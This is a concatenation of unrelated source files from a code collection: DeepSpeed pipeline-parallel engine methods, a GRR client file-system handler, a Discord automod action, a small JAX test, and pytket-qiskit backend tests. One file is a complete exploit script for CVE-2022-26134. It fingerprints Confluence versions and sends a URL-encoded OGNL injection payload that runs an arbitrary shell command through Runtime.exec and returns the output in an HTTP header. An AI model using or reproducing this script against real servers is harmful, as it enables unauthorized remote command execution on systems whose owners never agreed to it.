self._send_tensor_meta(outputs, self.next_stage)
if isinstance(outputs, torch.Tensor):
p2p.send(outputs, self.next_stage)
elif isinstance(outputs, tuple):
for idx, buffer in enumerate(outputs):
p2p.send(buffer, self.next_stage)
else:
raise NotImplementedError('Could not send output of type '
f'{type(outputs)}')
# Restore the boolean tensor
if self.module.__class__.__name__ == 'GPT2ModelPipe':
outputs = list(outputs)
outputs[-1] = outputs[-1].bool()
outputs = tuple(outputs)
if self.wall_clock_breakdown():
self.timers('pipe_send_output').stop()
def _exec_send_grads(self, buffer_id):
if self.wall_clock_breakdown():
self.timers('pipe_send_grad').start()
inputs = self.pipe_buffers['inputs'][buffer_id]
# Partition the gradient
if self.is_grad_partitioned:
part = PartitionedTensor(tensor=inputs[0].grad,
group=self.grid.get_slice_parallel_group())
# Clear the large output data, but save the computation graph
# Inject the partitoned tensor into the output before sending
# XXX Hack
inputs = tuple([part.to_meta(), part.data(), inputs[1]])
# XXX Terrible hack
# Drop the attention mask from the input buffer here. It does not have
# a grad that needs to be communicated. We free the buffer immediately
# after, so no need to restore it. The receiver also has a hack that skips
# the recv. This is because NCCL does not let us send torch.BoolTensor :-(.
if self.module.__class__.__name__ == 'GPT2ModelPipe':
inputs = list(inputs)
inputs.pop()
inputs = tuple(inputs)
if isinstance(inputs, torch.Tensor):
assert inputs.grad is not None
p2p.send(inputs.grad, self.prev_stage)
else:
# XXX terrible hacky branch
if self.is_grad_partitioned:
# First two sends are partitioned gradient
p2p.send(inputs[0], self.prev_stage)
p2p.send(inputs[1], self.prev_stage)
# XXX hack hack hack
#p2p.send(inputs[2].grad, self.prev_stage)
else:
for idx, buffer in enumerate(inputs):
# Skip tensors that will not produce a grad
if not buffer.is_floating_point():
assert buffer.grad is None
continue
assert buffer.grad is not None
p2p.send(buffer.grad, self.prev_stage)
# We can free up the input buffer now
self.pipe_buffers['inputs'][buffer_id] = None
if self.wall_clock_breakdown():
self.timers('pipe_send_grad').stop()
def _exec_recv_activations(self, buffer_id):
if self.wall_clock_breakdown():
self.timers('pipe_recv_input').start()
recvd = None
# Allocate the buffer if necessary
if self.pipe_recv_buf is None:
self.pipe_recv_buf = self._recv_tensor_meta(self.prev_stage)
if isinstance(self.pipe_recv_buf, torch.Tensor):
p2p.recv(self.pipe_recv_buf, self.prev_stage)
recvd = self.pipe_recv_buf.clone().detach()
recvd.requires_grad = recvd.is_floating_point()
else:
assert isinstance(self.pipe_recv_buf, tuple)
recvd = [None] * len(self.pipe_recv_buf)
for idx, buffer in enumerate(self.pipe_recv_buf):
assert torch.is_tensor(buffer)
# XXX hardcode meta type
if self.is_pipe_partitioned and idx == 0 and buffer.dtype != torch.long:
if self.meta_buffer is None:
self.meta_buffer = torch.zeros(buffer.size(),
dtype=torch.long,
device=self.device)
buffer = self.meta_buffer
p2p.recv(buffer, self.prev_stage)
recvd[idx] = buffer.clone().detach()
# NCCL does not like to send torch.BoolTensor types, so un-cast the
# attention mask
if self.module.__class__.__name__ == 'GPT2ModelPipe':
recvd[-1] = recvd[-1].bool()
recvd = tuple(recvd)
for buffer in recvd:
buffer.requires_grad = buffer.is_floating_point()
self.pipe_buffers['inputs'][buffer_id] = recvd
if self.wall_clock_breakdown():
self.timers('pipe_recv_input').stop()
def _exec_recv_grads(self, buffer_id):
if self.wall_clock_breakdown():
self.timers('pipe_recv_grad').start()
outputs = self.pipe_buffers['outputs'][buffer_id]
# XXX these shapes are hardcoded for Megatron
# Restore partitioned output if it was partitioned and we are sending full gradients
if self.is_pipe_partitioned and not self.is_grad_partitioned:
part_output = PartitionedTensor.from_meta(
meta=outputs[0],
local_part=outputs[1],
group=self.grid.get_slice_parallel_group())
outputs[0].data = part_output.full()
outputs = tuple([outputs[0], outputs[2]])
# save for backward
self.pipe_buffers['outputs'][buffer_id] = outputs
# Allocate gradient if necessary
if self.grad_layer is None:
if isinstance(outputs, torch.Tensor):
s = list(outputs.size())
self.grad_layer = self._allocate_buffer(s, num_buffers=1)[0]
else:
sizes = [list(t.size()) for t in outputs if t.is_floating_point()]
self.grad_layer = self._allocate_buffers(sizes, num_buffers=1)[0]
if isinstance(self.grad_layer, torch.Tensor):
p2p.recv(self.grad_layer, self.next_stage)
else:
assert isinstance(outputs, tuple)
for idx, buffer in enumerate(self.grad_layer):
# XXX GPT-2 hack
if self.is_grad_partitioned and idx == 0 and buffer.dtype != torch.long:
buffer.data = torch.zeros(buffer.size(),
dtype=torch.long,
device=self.device)
p2p.recv(buffer, self.next_stage)
if self.wall_clock_breakdown():
self.timers('pipe_recv_grad').stop()
def _exec_optimizer_step(self, lr_kwargs=None):
if self.wall_clock_breakdown():
self.timers('step_microstep').start()
self.timers('step').start()
self.mem_status('BEFORE STEP', reset_max=True)
self._force_grad_boundary = True
self._take_model_step(lr_kwargs)
self._force_grad_boundary = False
self.mem_status('AFTER STEP')
if self.tensorboard_enabled():
if self.global_rank == 0:
self.summary_events = [(f'Train/Samples/lr',
self.get_lr()[0],
self.global_samples)]
if self.fp16_enabled() and hasattr(self.optimizer, 'cur_scale'):
self.summary_events.append((f'Train/Samples/loss_scale',
self.optimizer.cur_scale,
self.global_samples))
for event in self.summary_events: # write_summary_events
self.summary_writer.add_scalar(event[0], event[1], event[2])
if self.wall_clock_breakdown():
self.timers('step_microstep').stop()
self.timers('step').stop()
if self.global_steps % self.steps_per_print() == 0:
self.timers.log([
'batch_input',
'forward_microstep',
'backward_microstep',
'backward_inner_microstep',
'backward_allreduce_microstep',
'backward_tied_allreduce_microstep',
'step_microstep'
])
if self.global_steps % self.steps_per_print() == 0:
self.timers.log([
'forward',
'backward',
'backward_inner',
'backward_allreduce',
'step'
])
def _zero_grads(self, inputs):
if isinstance(inputs, torch.Tensor):
if inputs.grad is not None:
inputs.grad.data.zero_()
else:
for t in inputs:
if t.grad is not None:
t.grad.data.zero_()
def _allocate_zeros(self, shape, fp16=None, **kwargs):
""" Allocate a tensor of zeros on the engine's device.
Arguments:
shape: the shape of the tensor to allocate
fp16 (bool): whether to use FP16. default: defer to self.fp16_enabled()
kwargs: passed to torch.zeros()
Returns:
A tensor from torch.zeros() allocated on self.device.
"""
if fp16 is None:
fp16 = self.fp16_enabled()
if fp16:
return torch.zeros(shape, dtype=torch.half, device=self.device, **kwargs)
else:
return torch.zeros(shape, device=self.device, **kwargs)
def _allocate_buffer(self, shape, num_buffers=-1, **kwargs):
buffers = []
if num_buffers == -1:
num_buffers = self.num_pipe_buffers
for count in range(num_buffers):
buffers.append(self._allocate_zeros(shape, **kwargs))
return buffers
def _allocate_buffers(self, shapes, requires_grad=False, num_buffers=-1):
buffers = []
if num_buffers == -1:
num_buffers = self.num_pipe_buffers
for count in range(num_buffers):
buffer = []
for shape in shapes:
buffer.append(self._allocate_zeros(shape, requires_grad=requires_grad))
buffers.append(buffer)
return buffers
def forward(self, *args, **kwargs):
"""Disabled for pipeline parallel training. See ``train_batch()``. """
raise PipelineError("Only train_batch() is accessible in pipeline mode.")
def backward(self, *args, **kwargs):
"""Disabled for pipeline parallel training. See ``train_batch()``. """
raise PipelineError("Only train_batch() is accessible in pipeline mode.")
def step(self, *args, **kwargs):
"""Disabled for pipeline parallel training. See ``train_batch()``. """
raise PipelineError("Only train_batch() is accessible in pipeline mode.")
def mem_status(self, msg, print_rank=-1, reset_max=False):
return
global mem_alloced, mem_cached
if not self.global_steps == 0 or not self.global_steps == 9:
#return
pass
if self.mpu.get_data_parallel_rank() != 0:
return
if self.global_rank != 0:
return
rank = self.global_rank
if print_rank != -1 and rank != print_rank:
return
torch.cuda.synchronize()
if reset_max:
torch.cuda.reset_max_memory_cached()
torch.cuda.reset_max_memory_allocated()
new_alloced = torch.cuda.memory_allocated()
new_cached = torch.cuda.memory_cached()
delta_alloced = new_alloced - mem_alloced
delta_cached = new_cached - mem_cached
mem_cached = new_cached
mem_alloced = new_alloced
max_alloced = torch.cuda.max_memory_allocated()
max_cached = torch.cuda.max_memory_cached()
# convert to GB for printing
new_alloced /= 1024**3
new_cached /= 1024**3
delta_alloced /= 1024**3
delta_cached /= 1024**3
max_alloced /= 1024**3
max_cached /= 1024**3
print(
f'RANK={rank} STAGE={self.stage_id} STEP={self.global_steps} MEMSTATS',
msg,
f'current alloc={new_alloced:0.4f}GB (delta={delta_alloced:0.4f}GB max={max_alloced:0.4f}GB) '
f'current cache={new_cached:0.4f}GB (delta={delta_cached:0.4f}GB max={max_cached:0.4f}GB)'
)
def module_state_dict(self):
"""Override hack to save a pipe model and return the directory path of the save.
This method should only be called by DeepSpeed's ``save_checkpoint()``. The
recommended way of saving a ``PipelineModule`` outside of ``save_checkpoint()``
is ``save_state_dict()``.
Returns:
None
"""
assert isinstance(self.module, PipelineModule)
assert self._curr_ckpt_path is not None, \
"PipelineEngine expects module_state_dict() to be called from save_checkpoint()"
self.module.save_state_dict(self._curr_ckpt_path)
return None
def load_module_state_dict(self, state_dict, strict=True):
"""Override hack to instead use a directory path.
This is important because pipeline models checkpoint by layer instead of rank.
If ``state_dict`` is not ``None`` or a ``str``, we revert to ``super()`` expecting a ``dict``.
Args:
state_dict (str, None): unused
strict (bool, optional): Strict state loading. Defaults to True.
"""
if (state_dict is not None) and (not isinstance(state_dict, str)):
super().load_module_state_dict(state_dict, strict)
return
self.module.load_state_dir(load_dir=self._curr_ckpt_path, strict=strict)
# A map of PipeInstruction types to methods. Each method will be executed with the
# kwargs provided to the PipeInstruction from the scheduler.
_INSTRUCTION_MAP = {
schedule.OptimizerStep: _exec_optimizer_step,
schedule.ReduceGrads: _exec_reduce_grads,
schedule.ReduceTiedGrads: _exec_reduce_tied_grads,
schedule.LoadMicroBatch: _exec_load_micro_batch,
schedule.ForwardPass: _exec_forward_pass,
schedule.BackwardPass: _exec_backward_pass,
schedule.SendActivation: _exec_send_activations,
schedule.RecvActivation: _exec_recv_activations,
schedule.SendGrad: _exec_send_grads,
schedule.RecvGrad: _exec_recv_grads,
}
def _exec_schedule(self, pipe_schedule):
self._reserve_pipe_buffers(pipe_schedule.num_pipe_buffers())
# For each step in the schedule
for step_cmds in pipe_schedule:
# For each instruction in the step
for cmd in step_cmds:
if type(cmd) not in self._INSTRUCTION_MAP:
raise RuntimeError(
f'{self.__class__.__name__} does not understand instruction {repr(cmd)}'
)
# Equivalent to: self._exec_forward_pass(buffer_id=0)
self._exec_instr = MethodType(self._INSTRUCTION_MAP[type(cmd)], self)
self._exec_instr(**cmd.kwargs)
def set_batch_fn(self, fn):
"""Execute a post-processing function on input data.
Args:
fn (function): The function to run.
"""
self.batch_fn = fn
|
the-stack_0_6506 | #!/usr/bin/env python
"""Implements VFSHandlers for files on the client."""
from __future__ import unicode_literals
import logging
import os
import platform
import re
import sys
import threading
from grr_response_client import client_utils
from grr_response_client import vfs
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import paths as rdf_paths
# File handles are cached here. They expire after a couple minutes so
# we don't keep files locked on the client.
FILE_HANDLE_CACHE = utils.TimeBasedCache(max_age=300)
class LockedFileHandle(object):
"""An object which encapsulates access to a file."""
def __init__(self, filename, mode="rb"):
self.lock = threading.RLock()
self.fd = open(filename, mode)
self.filename = filename
def Seek(self, offset, whence=0):
self.fd.seek(offset, whence)
def Read(self, length):
return self.fd.read(length)
def Tell(self):
return self.fd.tell()
def Close(self):
with self.lock:
self.fd.close()
class FileHandleManager(object):
"""An exclusive accesssor for a filehandle."""
def __init__(self, filename):
self.filename = filename
def __enter__(self):
try:
self.fd = FILE_HANDLE_CACHE.Get(self.filename)
except KeyError:
self.fd = LockedFileHandle(self.filename, mode="rb")
FILE_HANDLE_CACHE.Put(self.filename, self.fd)
# Wait for exclusive access to this file handle.
self.fd.lock.acquire()
return self.fd
def __exit__(self, exc_type=None, exc_val=None, exc_tb=None):
self.fd.lock.release()
class File(vfs.VFSHandler):
"""Read a regular file."""
supported_pathtype = rdf_paths.PathSpec.PathType.OS
auto_register = True
files = None
# Directories do not have a size.
size = None
# On windows reading devices must have an alignment.
alignment = 1
file_offset = 0
def __init__(self,
base_fd,
pathspec=None,
progress_callback=None,
full_pathspec=None):
super(File, self).__init__(
base_fd,
pathspec=pathspec,
full_pathspec=full_pathspec,
progress_callback=progress_callback)
if base_fd is None:
self.pathspec.Append(pathspec)
# We can stack on another directory, which means we concatenate their
# directory with ours.
elif base_fd.IsDirectory():
self.pathspec.last.path = utils.JoinPath(self.pathspec.last.path,
pathspec.path)
else:
raise IOError("File handler can not be stacked on another handler.")
self.path = self.pathspec.last.path
# We can optionally apply a global offset to the file.
if self.pathspec[0].HasField("offset"):
self.file_offset = self.pathspec[0].offset
self.pathspec.last.path_options = rdf_paths.PathSpec.Options.CASE_LITERAL
self.FileHacks()
self.filename = client_utils.CanonicalPathToLocalPath(self.path)
error = None
# Pythonic way - duck typing. Is the handle a directory?
try:
if not self.files:
# Note that the encoding of local path is system specific
local_path = client_utils.CanonicalPathToLocalPath(self.path + "/")
self.files = [
utils.SmartUnicode(entry) for entry in os.listdir(local_path)
]
# Some filesystems do not support unicode properly
except UnicodeEncodeError as e:
raise IOError(str(e))
except (IOError, OSError) as e:
self.files = []
error = e
# Ok, it's not. Is it a file then?
try:
with FileHandleManager(self.filename) as fd:
if pathspec.last.HasField("file_size_override"):
self.size = pathspec.last.file_size_override - self.file_offset
else:
# Work out how large the file is.
if self.size is None:
fd.Seek(0, 2)
end = fd.Tell()
if end == 0:
# This file is not seekable, we just use the default.
end = pathspec.last.file_size_override
self.size = end - self.file_offset
error = None
# Some filesystems do not support unicode properly
except UnicodeEncodeError as e:
raise IOError(str(e))
except IOError as e:
if error:
error = e
if error is not None:
raise error # pylint: disable=raising-bad-type
def FileHacks(self):
"""Hacks to make the filesystem look normal."""
if sys.platform == "win32":
import win32api # pylint: disable=g-import-not-at-top
# Make the filesystem look like the topmost level are the drive letters.
if self.path == "/":
self.files = win32api.GetLogicalDriveStrings().split("\x00")
# Remove empty strings and strip trailing backslashes.
self.files = [drive.rstrip("\\") for drive in self.files if drive]
# This regex will match the various windows devices. Raw hard disk devices
# must be considered files, however in windows, if we try to list them as
# directories this also works. Since the code above distinguished between
# files and directories using the file listing property, we must force
# treating raw devices as files.
elif re.match(r"/*\\\\.\\[^\\]+\\?$", self.path) is not None:
# Special case windows devices cant seek to the end so just lie about
# the size
self.size = 0x7fffffffffffffff
# Windows raw devices can be opened in two incompatible modes. With a
# trailing \ they look like a directory, but without they are the raw
# device. In GRR we only support opening devices in raw mode so ensure
# that we never append a \ to raw device name.
self.path = self.path.rstrip("\\")
# In windows raw devices must be accessed using sector alignment.
self.alignment = 512
elif sys.platform == "darwin":
# On Mac, raw disk devices are also not seekable to the end and have no
# size so we use the same approach as on Windows.
if re.match("/dev/r?disk.*", self.path):
self.size = 0x7fffffffffffffff
self.alignment = 512
def _GetDepth(self, path):
if path[0] != os.path.sep:
raise RuntimeError("Relative paths aren't supported.")
return len(re.findall(r"%s+[^%s]+" % (os.path.sep, os.path.sep), path))
def _GetDevice(self, path):
try:
return utils.Stat(path).GetDevice()
except (IOError, OSError) as error:
logging.error("Failed to obtain device for '%s' (%s)", path, error)
return None
def RecursiveListNames(self, depth=0, cross_devs=False):
path = client_utils.CanonicalPathToLocalPath(self.path)
path_depth = self._GetDepth(self.path)
if not cross_devs:
path_dev = self._GetDevice(path)
for root, dirs, files in os.walk(self.path):
dirs.sort()
files.sort()
root_depth = self._GetDepth(root)
# The recursion of the `os.walk` procedure is guided by the `dirs`
# variable [1]. By clearing `dirs` below we force the generator to omit
# certain rdf_paths.
#
# [1]: https://docs.python.org/2/library/os.html#os.walk
if not cross_devs and self._GetDevice(root) != path_dev:
dirs[:] = [] # We don't need to go deeper (clear the list)
elif root_depth - path_depth >= depth:
yield (root, dirs[:], files) # Shallow copy
dirs[:] = []
else:
yield (root, dirs, files)
def ListNames(self):
return self.files or []
def Read(self, length=None):
"""Read from the file."""
if self.progress_callback:
self.progress_callback()
available_to_read = max(0, (self.size or 0) - self.offset)
if length is None:
to_read = available_to_read
else:
to_read = min(length, available_to_read)
with FileHandleManager(self.filename) as fd:
offset = self.file_offset + self.offset
pre_padding = offset % self.alignment
# Due to alignment we read some more data than we need to.
aligned_offset = offset - pre_padding
fd.Seek(aligned_offset)
data = fd.Read(to_read + pre_padding)
self.offset += len(data) - pre_padding
return data[pre_padding:]
def Stat(self, path=None, ext_attrs=False):
"""Returns stat information of a specific path.
Args:
path: a Unicode string containing the path or None.
If path is None the value in self.path is used.
ext_attrs: Whether the call should also collect extended attributes.
Returns:
a StatResponse proto
Raises:
IOError when call to os.stat() fails
"""
# Note that the encoding of local path is system specific
local_path = client_utils.CanonicalPathToLocalPath(path or self.path)
result = client_utils.StatEntryFromPath(
local_path, self.pathspec, ext_attrs=ext_attrs)
# Is this a symlink? If so we need to note the real location of the file.
try:
result.symlink = utils.SmartUnicode(os.readlink(local_path))
except (OSError, AttributeError):
pass
return result
def ListFiles(self, ext_attrs=False):
"""List all files in the dir."""
if not self.IsDirectory():
raise IOError("%s is not a directory." % self.path)
for path in self.files:
try:
response = self.Stat(
path=utils.JoinPath(self.path, path), ext_attrs=ext_attrs)
pathspec = self.pathspec.Copy()
pathspec.last.path = utils.JoinPath(pathspec.last.path, path)
response.pathspec = pathspec
yield response
except OSError:
pass
def IsDirectory(self):
return self.size is None
def StatFS(self, path=None):
"""Call os.statvfs for a given list of rdf_paths. OS X and Linux only.
Note that a statvfs call for a network filesystem (e.g. NFS) that is
unavailable, e.g. due to no network, will result in the call blocking.
Args:
path: a Unicode string containing the path or None.
If path is None the value in self.path is used.
Returns:
posix.statvfs_result object
Raises:
RuntimeError: if called on windows
"""
if platform.system() == "Windows":
raise RuntimeError("os.statvfs not available on Windows")
local_path = client_utils.CanonicalPathToLocalPath(path or self.path)
return os.statvfs(local_path)
def GetMountPoint(self, path=None):
"""Walk back from the path to find the mount point.
Args:
path: a Unicode string containing the path or None.
If path is None the value in self.path is used.
Returns:
path string of the mount point
"""
path = os.path.abspath(
client_utils.CanonicalPathToLocalPath(path or self.path))
while not os.path.ismount(path):
path = os.path.dirname(path)
return path
class TempFile(File):
"""GRR temporary files on the client."""
supported_pathtype = rdf_paths.PathSpec.PathType.TMPFILE
|
the-stack_0_6508 | from dataclasses import dataclass
from datetime import timedelta
from typing import Optional, Type, TypeVar
from discord.abc import Messageable
from commanderbot.ext.automod.automod_action import AutomodAction, AutomodActionBase
from commanderbot.ext.automod.automod_event import AutomodEvent
from commanderbot.lib import AllowedMentions, ChannelID, JsonObject
from commanderbot.lib.utils import timedelta_from_field_optional
ST = TypeVar("ST")
@dataclass
class SendMessage(AutomodActionBase):
"""
Send a message.
Attributes
----------
content
The content of the message to send.
channel
The channel to send the message in. Defaults to the channel in context.
allowed_mentions
The types of mentions allowed in the message. Unless otherwise specified, only
"everyone" mentions will be suppressed.
delete_after
The amount of time to delete the message after, if at all.
"""
content: str
channel: Optional[ChannelID] = None
allowed_mentions: Optional[AllowedMentions] = None
delete_after: Optional[timedelta] = None
@classmethod
def from_data(cls: Type[ST], data: JsonObject) -> ST:
allowed_mentions = AllowedMentions.from_field_optional(data, "allowed_mentions")
delete_after = timedelta_from_field_optional(data, "delete_after")
return cls(
description=data.get("description"),
content=data.get("content"),
channel=data.get("channel"),
allowed_mentions=allowed_mentions,
delete_after=delete_after,
)
async def resolve_channel(self, event: AutomodEvent) -> Optional[Messageable]:
if self.channel is not None:
return event.bot.get_channel(self.channel)
return event.channel
async def apply(self, event: AutomodEvent):
if channel := await self.resolve_channel(event):
content = event.format_content(self.content)
allowed_mentions = self.allowed_mentions or AllowedMentions.not_everyone()
params = dict(
allowed_mentions=allowed_mentions,
)
if self.delete_after is not None:
params.update(delete_after=self.delete_after.total_seconds())
await channel.send(content, **params)
def create_action(data: JsonObject) -> AutomodAction:
return SendMessage.from_data(data)
|
the-stack_0_6510 | # -*- coding: utf-8 -*-
# Author: Naqwada (RuptureFarm 1029) <[email protected]>
# License: MIT License (http://www.opensource.org/licenses/mit-license.php)
# Docs: https://github.com/Naqwa/CVE-2022-26134
# Website: http://samy.link/
# Linkedin: https://www.linkedin.com/in/samy-younsi/
# Note: FOR EDUCATIONAL PURPOSE ONLY.
from bs4 import BeautifulSoup
import requests
import urllib3
import re
import sys
urllib3.disable_warnings()
def banner():
CVE_2022_26134Logo = """
_______ ________
/ ____/ | / / ____/
/ / | | / / __/
/ /___ | |/ / /___
\____/ |___/_____/___ ___ _____________ __ __
|__ \ / __ \__ \|__ \ |__ \ / ___< /__ // // /
__/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_
/ __// /_/ / __// __/_____/ __// /_/ / /___/ /__ __/
/____/\____/____/____/ /____/\____/_//____/ /_/
\033[1;91mCVE-2022-26134 - OGNL injection vulnerability\033[1;m
Author: \033[1;92mNaqwada\033[1;m
RuptureFarm 1029
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(CVE_2022_26134Logo))
def check_target_version(host):
try:
response = requests.get("{}/login.action".format(host), verify=False, timeout=8)
if response.status_code == 200:
filter_version = re.findall("<span id='footer-build-information'>.*</span>", response.text)
if len(filter_version) >= 1:
version = filter_version[0].split("'>")[1].split('</')[0]
return version
else:
return 0
else:
return host
except:
return False
def send_payload(host, command):
payload = "%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D".format(command)
response = requests.get("{}/{}/".format(host, payload), verify=False, allow_redirects=False)
try:
if response.status_code == 302:
return response.headers["X-Cmd-Response"]
else:
return "This target does not seem to be vulnerable."
except:
return "This target does not seem to be vulnerable."
def main():
banner()
if len(sys.argv) < 3:
print("\033[1;94mHow to use:\033[1;m")
print("python3 {} https://target.com cmd".format(sys.argv[0]))
print("ex: python3 {} https://target.com id".format(sys.argv[0]))
print("ex: python3 {} https://target.com 'ps aux'".format(sys.argv[0]))
return
target = sys.argv[1]
cmd = sys.argv[2]
version = check_target_version(target)
if version:
print("Confluence target version: \033[1;94m{}\033[1;m".format(version))
elif version == False:
print("The target seems offline.")
return
else:
print("Can't find the used version for this target.")
exec_payload = send_payload(target, cmd)
print(exec_payload)
if __name__ == "__main__":
main() |
the-stack_0_6512 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Learned Interpreters workflows."""
from absl.testing import absltest
import jax.numpy as jnp
from ipagnn.adapters import common_adapters
class CommonAdaptersTest(absltest.TestCase):
def test_compute_weighted_cross_entropy(self):
logits = jnp.array([
[[.8, .2, -.5],
[.2, .5, -.1]],
[[.1, -.2, .2],
[.4, -.5, .1]],
])
labels = jnp.array([
[0, 1],
[2, 2],
])
common_adapters.compute_weighted_cross_entropy(logits, labels)
if __name__ == '__main__':
absltest.main()
|
the-stack_0_6513 | # Copyright 2019-2022 Cambridge Quantum Computing
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import sys
from collections import Counter
from typing import Dict, cast
import math
import cmath
import pickle
from hypothesis import given, strategies
import numpy as np
from pytket.circuit import Circuit, OpType, BasisOrder, Qubit, reg_eq # type: ignore
from pytket.passes import CliffordSimp # type: ignore
from pytket.pauli import Pauli, QubitPauliString # type: ignore
from pytket.predicates import CompilationUnit, NoMidMeasurePredicate # type: ignore
from pytket.architecture import Architecture # type: ignore
from pytket.mapping import MappingManager, LexiLabellingMethod, LexiRouteRoutingMethod # type: ignore
from pytket.transform import Transform # type: ignore
from pytket.backends import (
ResultHandle,
CircuitNotRunError,
CircuitNotValidError,
CircuitStatus,
StatusEnum,
)
from pytket.extensions.qiskit import (
IBMQBackend,
AerBackend,
AerStateBackend,
AerUnitaryBackend,
IBMQEmulatorBackend,
)
from pytket.extensions.qiskit import qiskit_to_tk, process_characterisation
from pytket.utils.expectations import (
get_pauli_expectation_value,
get_operator_expectation_value,
)
from pytket.utils.operators import QubitPauliOperator
from pytket.utils.results import compare_unitaries
from qiskit import IBMQ # type: ignore
from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister
from qiskit.circuit import Parameter # type: ignore
from qiskit.providers.aer.noise.noise_model import NoiseModel # type: ignore
from qiskit.providers.aer.noise import ReadoutError # type: ignore
from qiskit.providers.aer.noise.errors import depolarizing_error, pauli_error # type: ignore
import pytest
# TODO add tests for `get_operator_expectation_value`
skip_remote_tests: bool = (
not IBMQ.stored_account() or os.getenv("PYTKET_RUN_REMOTE_TESTS") is None
)
REASON = "PYTKET_RUN_REMOTE_TESTS not set (requires configuration of IBMQ account)"
@pytest.fixture(scope="module")
def santiago_backend() -> IBMQBackend:
return IBMQBackend("ibmq_santiago", hub="ibm-q", group="open", project="main")
@pytest.fixture(scope="module")
def lima_backend() -> IBMQBackend:
return IBMQBackend("ibmq_lima", hub="ibm-q", group="open", project="main")
def circuit_gen(measure: bool = False) -> Circuit:
c = Circuit(2, 2)
c.H(0)
c.CX(0, 1)
if measure:
c.measure_all()
return c
def get_test_circuit(measure: bool) -> QuantumCircuit:
qr = QuantumRegister(5)
cr = ClassicalRegister(5)
qc = QuantumCircuit(qr, cr)
# qc.h(qr[0])
qc.x(qr[0])
qc.x(qr[2])
qc.cx(qr[1], qr[0])
# qc.h(qr[1])
qc.cx(qr[0], qr[3])
qc.cz(qr[2], qr[0])
qc.cx(qr[1], qr[3])
# qc.rx(PI/2,qr[3])
qc.z(qr[2])
if measure:
qc.measure(qr[0], cr[0])
qc.measure(qr[1], cr[1])
qc.measure(qr[2], cr[2])
qc.measure(qr[3], cr[3])
return qc
def test_statevector() -> None:
c = circuit_gen()
b = AerStateBackend()
state = b.run_circuit(c).get_state()
assert np.allclose(state, [math.sqrt(0.5), 0, 0, math.sqrt(0.5)], atol=1e-10)
c.add_phase(0.5)
state1 = b.run_circuit(c).get_state()
assert np.allclose(state1, state * 1j, atol=1e-10)
def test_sim() -> None:
c = circuit_gen(True)
b = AerBackend()
shots = b.run_circuit(c, n_shots=1024).get_shots()
print(shots)
def test_measures() -> None:
n_qbs = 12
c = Circuit(n_qbs, n_qbs)
x_qbs = [2, 5, 7, 11]
for i in x_qbs:
c.X(i)
c.measure_all()
b = AerBackend()
shots = b.run_circuit(c, n_shots=10).get_shots()
all_ones = True
all_zeros = True
for i in x_qbs:
all_ones = all_ones and bool(np.all(shots[:, i]))
for i in range(n_qbs):
if i not in x_qbs:
all_zeros = all_zeros and (not np.any(shots[:, i]))
assert all_ones
assert all_zeros
def test_noise() -> None:
with open(os.path.join(sys.path[0], "ibmqx2_properties.pickle"), "rb") as f:
properties = pickle.load(f)
noise_model = NoiseModel.from_backend(properties)
n_qbs = 5
c = Circuit(n_qbs, n_qbs)
x_qbs = [2, 0, 4]
for i in x_qbs:
c.X(i)
c.measure_all()
b = AerBackend(noise_model)
n_shots = 50
c = b.get_compiled_circuit(c)
shots = b.run_circuit(c, n_shots=n_shots, seed=4).get_shots()
zer_exp = []
one_exp = []
for i in range(n_qbs):
expectation = np.sum(shots[:, i]) / n_shots
if i in x_qbs:
one_exp.append(expectation)
else:
zer_exp.append(expectation)
assert min(one_exp) > max(zer_exp)
c2 = (
Circuit(4, 4)
.H(0)
.CX(0, 2)
.CX(3, 1)
.T(2)
.CX(0, 1)
.CX(0, 3)
.CX(2, 1)
.measure_all()
)
c2 = b.get_compiled_circuit(c2)
shots = b.run_circuit(c2, n_shots=10, seed=5).get_shots()
assert shots.shape == (10, 4)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_process_characterisation() -> None:
if not IBMQ.active_account():
IBMQ.load_account()
provider = IBMQ.providers(hub="ibm-q", group="open")[0]
back = provider.get_backend("ibmq_santiago")
char = process_characterisation(back)
arch: Architecture = char.get("Architecture", Architecture([]))
node_errors: dict = char.get("NodeErrors", {})
link_errors: dict = char.get("EdgeErrors", {})
assert len(arch.nodes) == 5
assert len(arch.coupling) == 8
assert len(node_errors) == 5
assert len(link_errors) == 8
def test_process_characterisation_no_noise_model() -> None:
my_noise_model = NoiseModel()
back = AerBackend(my_noise_model)
assert back.backend_info.get_misc("characterisation") is None
c = Circuit(4).CX(0, 1).H(2).CX(2, 1).H(3).CX(0, 3).H(1).X(0)
c = back.get_compiled_circuit(c)
assert back.valid_circuit(c)
def test_process_characterisation_incomplete_noise_model() -> None:
my_noise_model = NoiseModel()
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [0, 1])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [1])
my_noise_model.add_quantum_error(depolarizing_error(0.1, 1), ["u3"], [3])
my_noise_model.add_quantum_error(
pauli_error([("X", 0.35), ("Z", 0.65)]), ["u2"], [0]
)
my_noise_model.add_quantum_error(
pauli_error([("X", 0.35), ("Y", 0.65)]), ["u1"], [2]
)
back = AerBackend(my_noise_model)
